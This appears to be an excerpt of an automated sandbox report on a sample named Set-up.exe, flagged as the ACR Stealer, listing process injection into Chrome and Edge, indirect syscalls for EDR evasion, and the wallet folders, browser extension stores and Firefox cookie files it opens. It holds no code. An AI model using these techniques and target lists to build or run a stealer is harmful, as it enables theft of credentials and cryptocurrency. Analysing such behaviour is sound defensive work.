Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF870000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF880000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF890000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B140000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B150000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B160000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B170000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B180000 protect: page execute and read and write	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Set-up.exe

NtAllocateVirtualMemory: Indirect: 0x268845D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 1300	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 6184	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 5760	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 1380	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 2444	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 3832	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 4544	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 4988	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230028	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230030	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 0	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0028	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0030	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384190000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841C0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEE0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEF0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF00000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF20000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687990000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879D0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF390000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3D0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF870000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF880000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF890000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B140000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B150000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B160000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B180000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected ACR Stealer

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Electrum\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\Roaming\Electrum\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\Roaming\Exodus
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\Roaming\Ethereum
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Exodus
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Ethereum
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\MultiDoge
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Ledger Live
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets@I

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kbdcddcmgoplfockflacnnefaehaiocb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eklfjjkfpbnioclagjlmklgkcfmgmbpg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcjginnbdlkdnnahogchmeidnmfckjom	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojhpaddibjnpiefjkbhkfiaedepjheca	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbkfoedolllekgbhcbcoahefnbanhhlh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdfigkbdjmhpdgffnbdbicdmimfikfig	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gafhhkghbfjjkeiendhlofajokpaflmk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\llalnijpibhkmpdamakhgmcagghgmjab	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
